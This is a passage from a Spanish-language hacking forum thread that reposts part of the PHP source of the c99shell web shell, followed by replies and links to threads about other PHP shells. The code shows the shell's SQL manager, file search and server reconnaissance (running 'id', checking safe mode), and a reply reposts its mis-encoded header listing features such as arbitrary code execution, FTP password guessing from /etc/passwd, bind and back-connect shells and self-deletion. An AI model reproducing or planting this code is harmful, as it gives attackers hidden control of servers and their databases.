  691.  if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  692.  if ((!$submit) or ($sql_act))
  693.  {
  694.   echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
  695.   if ($tbl_struct)
  696.   {
  697.    echo "<td valign=\"top\"><b>Fields:</b><br>";
  698.    foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
  699.    echo "</td></tr></table>";
  700.   }
  701.  }
  702.  if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
  703. }
  704. }
  705. if (!function_exists("mysql_create_db"))
  706. {
  707. function mysql_create_db($db,$sock="")
  708. {
  709.  $sql = "CREATE DATABASE `".addslashes($db)."`;";
  710.  if ($sock) {return mysql_query($sql,$sock);}
  711.  else {return mysql_query($sql);}
  712. }
  713. }
  714. if (!function_exists("mysql_query_parse"))
  715. {
  716. function mysql_query_parse($query)
  717. {
  718.  $query = trim($query);
  719.  $arr = explode (" ",$query);
  720.  /*array array()
  721.  {
  722.   "METHOD"=>array(output_type),
  723.   "METHOD1"...
  724.   ...
  725.  }
  726.  if output_type == 0, no output,
  727.  if output_type == 1, no output if no error
  728.  if output_type == 2, output without control-buttons
  729.  if output_type == 3, output with control-buttons
  730.  */
  731.  $types = array(
  732.   "SELECT"=>array(3,1),
  733.   "SHOW"=>array(2,1),
  734.   "DELETE"=>array(1),
  735.   "DROP"=>array(1)
  736.  );
  737.  $result = array();
  738.  $op = strtoupper($arr[0]);
  739.  if (is_array($types[$op]))
  740.  {
  741.   $result["propertions"] = $types[$op];
  742.   $result["query"]  = $query;
  743.   if ($types[$op] == 2)
  744.   {
  745.    foreach($arr as $k=>$v)
  746.    {
  747.     if (strtoupper($v) == "LIMIT")
  748.     {
  749.      $result["limit"] = $arr[$k+1];
  750.      $result["limit"] = explode(",",$result["limit"]);
  751.      if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
  752.      unset($arr[$k],$arr[$k+1]);
  753.     }
  754.    }
  755.   }
  756.  }
  757.  else {return false;}
  758. }
  759. }
  760. if (!function_exists("c99fsearch"))
  761. {
  762. function c99fsearch($d)
  763. {
  764.  global $found;
  765.  global $found_d;
  766.  global $found_f;
  767.  global $search_i_f;
  768.  global $search_i_d;
  769.  global $a;
  770.  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  771.  $h = opendir($d);
  772.  while (($f = readdir($h)) !== false)
  773.  {
  774.   if($f != "." && $f != "..")
  775.   {
  776.    $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== false) || ($a["name_regexp"] and ereg($a["name"],$f));
  777.    if (is_dir($d.$f))
  778.    {
  779.     $search_i_d++;
  780.     if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
  781.     if (!is_link($d.$f)) {c99fsearch($d.$f);}
  782.    }
  783.    else
  784.    {
  785.     $search_i_f++;
  786.     if ($bool)
  787.     {
  788.      if (!empty($a["text"]))
  789.      {
  790.       $r = @file_get_contents($d.$f);
  791.       if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
  792.       if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
  793.       if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
  794.       else {$bool = strpos(" ".$r,$a["text"],1);}
  795.       if ($a["text_not"]) {$bool = !$bool;}
  796.       if ($bool) {$found[] = $d.$f; $found_f++;}
  797.      }
  798.      else {$found[] = $d.$f; $found_f++;}
  799.     }
  800.    }
  801.   }
  802.  }
  803.  closedir($h);
  804. }
  805. }
  806. if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
  807. //Sending headers
  808. function onphpshutdown()
  809. {
  810.  global $gzipencode,$ft;
  811.  if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
  812.  {
  813.   $v = @ob_get_contents();
  814.   @ob_start("ob_gzHandler");
  815.   echo $v;
  816.  }
  817. }
  818. function c99shexit()
  819. {
  820.  onphpshutdown();
  821.  exit;
  822. }
  823. header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
  824. header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
  825. header("Cache-Control: no-store, no-cache, must-revalidate");
  826. header("Cache-Control: post-check=0, pre-check=0", false);
  827. header("Pragma: no-cache");
  828. if (empty($tmpdir))
  829. {
  830.  $tmpdir = ini_get("upload_tmp_dir");
  831.  if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
  832. }
  833. $tmpdir = realpath($tmpdir);
  834. $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
  835. if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
  836. if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
  837. else {$tmpdir_logs = realpath($tmpdir_logs);}
  838. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  839. {
  840.  $safemode = true;
  841.  $hsafemode = "<font color=red>ON (secure)</font>";
  842. }
  843. else {$safemode = false; $hsafemode = "<font color=green>OFF (not secure)</font>";}
  844. $v = @ini_get("open_basedir");
  845. if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=red>".$v."</font>";}
  846. else {$openbasedir = false; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
  847. $sort = htmlspecialchars($sort);
  848. if (empty($sort)) {$sort = $sort_default;}
  849. $sort[1] = strtolower($sort[1]);
  850. $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
  851. if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
  852. $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
  853. @ini_set("highlight.bg",$highlight_bg); //FFFFFF
  854. @ini_set("highlight.comment",$highlight_comment); //#FF8000
  855. @ini_set("highlight.default",$highlight_default); //#0000BB
  856. @ini_set("highlight.html",$highlight_html); //#000000
  857. @ini_set("highlight.keyword",$highlight_keyword); //#007700
  858. @ini_set("highlight.string",$highlight_string); //#DD0000
  859. if (!is_array($actbox)) {$actbox = array();}
  860. $dspact = $act = htmlspecialchars($act);
  861. $disp_fullpath = $ls_arr = $notls = null;
  862. $ud = urlencode($d);
  863. ?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
  864. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  865. if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
  866. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  867. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  868. $d = str_replace("\\\\","\\",$d);
  869. $dispd = htmlspecialchars($d);
  870. $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
  871. $i = 0;
  872. foreach($pd as $b)
  873. {
  874.  $t = "";
  875.  $j = 0;
  876.  foreach ($e as $r)
  877.  {
  878.   $t.= $r.DIRECTORY_SEPARATOR;
  879.   if ($j == $i) {break;}
  880.   $j++;
  881.  }
  882.  echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
  883.  $i++;
  884. }
  885. echo "&nbsp;&nbsp;&nbsp;";
  886. if (is_writable($d))
  887. {
  888.  $wd = true;
  889.  $wdt = "<font color=green>[ ok ]</font>";
  890.  echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
  891. }
  892. else
  893. {
  894.  $wd = false;
  895.  $wdt = "<font color=red>[ Read-Only ]</font>";
  896.  echo "<b>".view_perms_color($d)."</b>";
  897. }
  898. if (is_callable("disk_free_space"))
  899. {
  900.  $free = disk_free_space($d);
  901.  $total = disk_total_space($d);
  902.  if ($free === false) {$free = 0;}
  903.  if ($total === false) {$total = 0;}
  904.  if ($free < 0) {$free = 0;}
  905.  if ($total < 0) {$total = 0;}
  906.  $used = $total-$free;
  907.  $free_percent = round(100/($total/$free),2);
  908.  echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
  909. }
  910. echo "<br>";
  911. $letters = "";
  912. if ($win)
  913. {
  914.  $v = explode("\\",$d);
  915.  $v = $v[0];
  916.  foreach (range("a","z") as $letter)
  917.  {
  918.   $bool = $isdiskette = in_array($letter,$safemode_diskettes);
  919.   if (!$bool) {$bool = is_dir($letter.":\\");}
  920.   if ($bool)
  921.   {
  922.    $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
  923.    if ($letter.":" != $v) {$letters .= $letter;}
  924.    else {$letters .= "<font color=green>".$letter."</font>";}
  925.    $letters .= " ]</a> ";
  926.   }
  927.  }
  928.  if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
  929. }
  930. if (count($quicklaunch) > 0)
  931. {
  932.  foreach($quicklaunch as $item)
  933.  {
  934.   $item[1] = str_replace("%d",urlencode($d),$item[1]);
  935.   $item[1] = str_replace("%sort",$sort,$item[1]);
  936.   $v = realpath($d."..");
  937.   if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
  938.   $item[1] = str_replace("%upd",urlencode($v),$item[1]);
  939.   echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
  940.  }
  941. }
  942. echo "</p></td></tr></table><br>";
  943. if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
  944. echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
  945. if ($act == "") {$act = $dspact = "ls";}
  946. if ($act == "sql")
  947. {
  948.  $sql_surl = $surl."act=sql";
  949.  if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
  950.  if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
  951.  if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
  952.  if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
  953.  if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
  954.  $sql_surl .= "&";
  955.  ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
  956.  if ($sql_server)
  957.  {
  958.   $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  959.   $err = mysql_smarterror();
  960.   @mysql_select_db($sql_db,$sql_sock);
  961.   if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
  962.  }
  963.  else {$sql_sock = false;}
  964.  echo "<b>SQL Manager:</b><br>";
  965.  if (!$sql_sock)
  966.  {
  967.   if (!$sql_server) {echo "NO CONNECTION";}
  968.   else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
  969.  }
  970.  else
  971.  {
  972.   $sqlquicklaunch = array();
  973.   $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
  974.   $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
  975.   $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
  976.   $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
  977.   $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
  978.   $sqlquicklaunch[] = array("Logout",$surl."act=sql");
  979.   echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
  980.   if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
  981.   echo "</center>";
  982.  }
  983.  echo "</td></tr><tr>";
  984.  if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
  985.  else
  986.  {
  987.   //Start left panel
  988.   if (!empty($sql_db))
  989.   {
  990.    ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
  991.    $result = mysql_list_tables($sql_db);
  992.    if (!$result) {echo mysql_smarterror();}
  993.    else
  994.    {
  995.     echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
  996.     $c = 0;
  997.     while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
  998.     if (!$c) {echo "No tables found in database.";}
  999.    }
  1000.   }
  1001.   else
  1002.   {
  1003.    ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
  1004.    $result = mysql_list_dbs($sql_sock);
  1005.    if (!$result) {echo mysql_smarterror();}
  1006.    else
  1007.    {
  1008.     ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
  1009.     $c = 0;
  1010.     $dbs = "";
  1011.     while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
  1012.     echo "<option value=\"\">Databases (".$c.")</option>";
  1013.     echo $dbs;
  1014.    }
  1015.    ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form>
« Última modificación: Abril 28, 2013, 05:15:13 pm por 2Fac3R »

Desconectado 2Fac3R

  • *
  • Underc0der
  • Mensajes: 241
  • Actividad:
    0%
  • Reputación 0
  • Why be a king, when you can be a god
    • Ver Perfil
    • Escuela de Hackers & Programación
  • Skype: rockeg_18
  • Twitter: @2Fac3R
« Respuesta #1 en: Abril 28, 2013, 05:18:53 pm »
Te modifiqué el post, estaba muy largo el código y daba problemas dentro del tag de "code", así que borré una pequeña parte comentada y quedó bien.

Acá dejo la parte que borré por si a alguien le interesa:

Código: PHP
  1. /*
  2. ******************************************************************************************************
  3. *
  4. *                                       c99shell.php v.1.0 pre-release build #13
  5. *                                                       Freeware license.
  6. *                                                               © CCTeaM.
  7. *  c99shell - ôàéë-ìåíåäæåð ÷åðåç www-áðîóçåð, "çàòî÷åíûé" äëÿ âçëîìà.
  8. *  Âû ìîæåòå áåñïëàòíî ñêà÷àòü ïîñëåäíþþ âåðñèþ íà äîìàøíåé ñòðàíè÷êå ïðîäóêòà:
  9.    http://ccteam.ru/releases/c99shell
  10. *
  11. *  WEB: http://ccteam.ru
  12. *  ICQ UIN #: 656555
  13. *
  14. *  Îñîáåííîñòè:
  15. *  + óïðàâëåíèå ëîêàëüíûìè è óäàëåííûìè (ftp, samba) ôàéëàìè/ïàïêàìè, ñîðòèðîâêà
  16. *    çàêà÷èâàíèå ñêà÷èâàíèå ôàéëîâ è ïàïîê
  17. *    (ïðåäâîðèòåëüíî óïàêîâûâàåòñÿ/ðàñïàêîâûâàåòñÿ ÷åðåç tar)
  18. *    ïðîäâèíóòûé ïîèñê (âîçìîæåí âíóòðè ôàéëîâ)
  19. *    modify-time è access-time ó ôàéëîâ íå ìåíÿþòñÿ ïðè ðåäàêòèðîâàíèè (äëÿ îòêë. ñì $filestealth)
  20. *  + âûïîëíåíèå ïðîèçâîëüíîãî PHP-êîäà
  21. *  + êîäèðîâùèê äàííûõ ÷åðåç md5, unix-md5, sha1, crc32, base64
  22. *  + áûñòðûé ëîêàëüíûé àíàëèç áåçîïàñíîñòè ÎÑ
  23. *  + áûñòðîå ftp-ñêàíèðîâàíèå íà ñâÿçêè login;login èç /etc/passwd (îáû÷íî äàåò äîñòóï ê 1/100 àêêàóíòîâ)
  24. *    ïîñòðàíè÷íûé âûâîä, ñîðòèðîâêà, ãðóïïîâûå îïåðàöèè íàä ÁÄ/òàáëèöàìè, óïðàâëåíèå ïðîöåññàìè SQL)
  25. *  + ñêðèïò "ëþáèò" include: àâòîìàòè÷åñêè èùåò ïåðåìåííûå ñ äåñêðèïòîðàìè è âñòàâëÿåò èõ â ññûëêè (îïöèàëüíî)
  26.      òàêæå ìîæíî èçìåíèòü $surl (áàçîâàÿ ññûëêà) êàê ÷åðåç êîíôèãóðàöèþ (ïðèíóäèòåëüíî) òàê è ÷åðåç cookie "c99sh_surl",
  27.      èäåò àâòî-çàïèñü çíà÷åíèÿ $set_surl â cookie "set_surl"
  28. *  + âîçìîæíîñòü "çàáèíäèòü" /bin/bash íà îïðåäåëåííûé ïîðò ñ ïðîèçâîëüíûì ïàðîëåì,
  29. *    èëè ñäåëàòü back connect (ïðîèçâîäèòñÿ òåñòèðîâàíèå ñîåäåíåíèÿ, è âûâîäÿòñÿ ïàðàìåòðû äëÿ çàïóñêà NetCat).
  30. *  + âîçìîæíîñòü áûñòðîãî ñàìî-óäàëåíèÿ ñêðèïòà
  31. *  + àâòîìàòèçèðîâàíàÿ îòïðàâêà ñîîáùåíèé î íåäîðàáîòêàõ è ïîæåëàíèÿõ àâòîðó (÷åðåç mail())
  32. *
  33. *       Ïðèâåäåí äàëåêî íå ïîëíûé ñïèñîê âîçìîæíîñòåé.
  34. *
  35. *   Îæèäàåìûå èçìåíåíèÿ:
  36. *  ~ Ðàçâèòèå sql-ìåíåäæåðà
  37. *  ~ Äîáàâëåíèå íåäîñòàþùèõ ðàñøèðåíèé ôàéëîâ
  38. *
  39. *  ~-~ Ïèøèòå îáî âñåõ íàéäåíûõ íåäîðàáîòêàõ, æåëàåìûõ èçìåíåíèÿõ è äîðàáîòêàõ (äàæå î ñàìûõ íåçíà÷èòåëüíûõ!)
  40.        â ICQ UIN #656555 ëèáî ÷åðåç ðàçäåë "feedback", áóäóò ðàññìîòðåíû âñå ïðåäëîæåíèÿ è ïîæåëàíèÿ.
  41. *
  42. *  Last modify: 29.07.2005
  43.  

Buen aporte!
Zalu2
« Última modificación: Marzo 27, 2014, 05:32:45 pm por Expermicid »
Escuela de Hackers & Programación.
http://ihackndev.blogspot.com/

Desconectado D4rkC0d3r

  • *
  • Underc0der
  • Mensajes: 202
  • Actividad:
    0%
  • Reputación 0
  • \xeb\x16\x5e\x31\xd2\
    • Ver Perfil
    • Ethical Hacking, Malware Analysis, Disinfection Techniques and more...
« Respuesta #2 en: Abril 28, 2013, 08:08:29 pm »
Gracias por el aporte!!!  ;D

Saludos!

D4rkC0d3r

 

¿Te gustó el post? COMPARTILO!



Php Reverse Shell Socket Duda.

Iniciado por hdbreaker

Respuestas: 2
Vistas: 1635
Último mensaje Julio 13, 2012, 12:20:53 am
por hdbreaker
v3n0m's shell 0.01 [php]

Iniciado por v3n0m

Respuestas: 1
Vistas: 1072
Último mensaje Junio 20, 2011, 05:39:40 pm
por ANTRAX
CCCP Shell

Iniciado por tfxla

Respuestas: 1
Vistas: 1649
Último mensaje Septiembre 10, 2014, 08:47:15 am
por ANTRAX
[PHP Shell] Poison Shell 0.7

Iniciado por BigBear

Respuestas: 11
Vistas: 4514
Último mensaje Noviembre 09, 2012, 10:43:56 am
por BigBear
[PHP Shell] Poison Shell 1.0 (Version Identada)

Iniciado por ANTRAX

Respuestas: 0
Vistas: 1502
Último mensaje Enero 01, 2013, 10:16:18 pm
por ANTRAX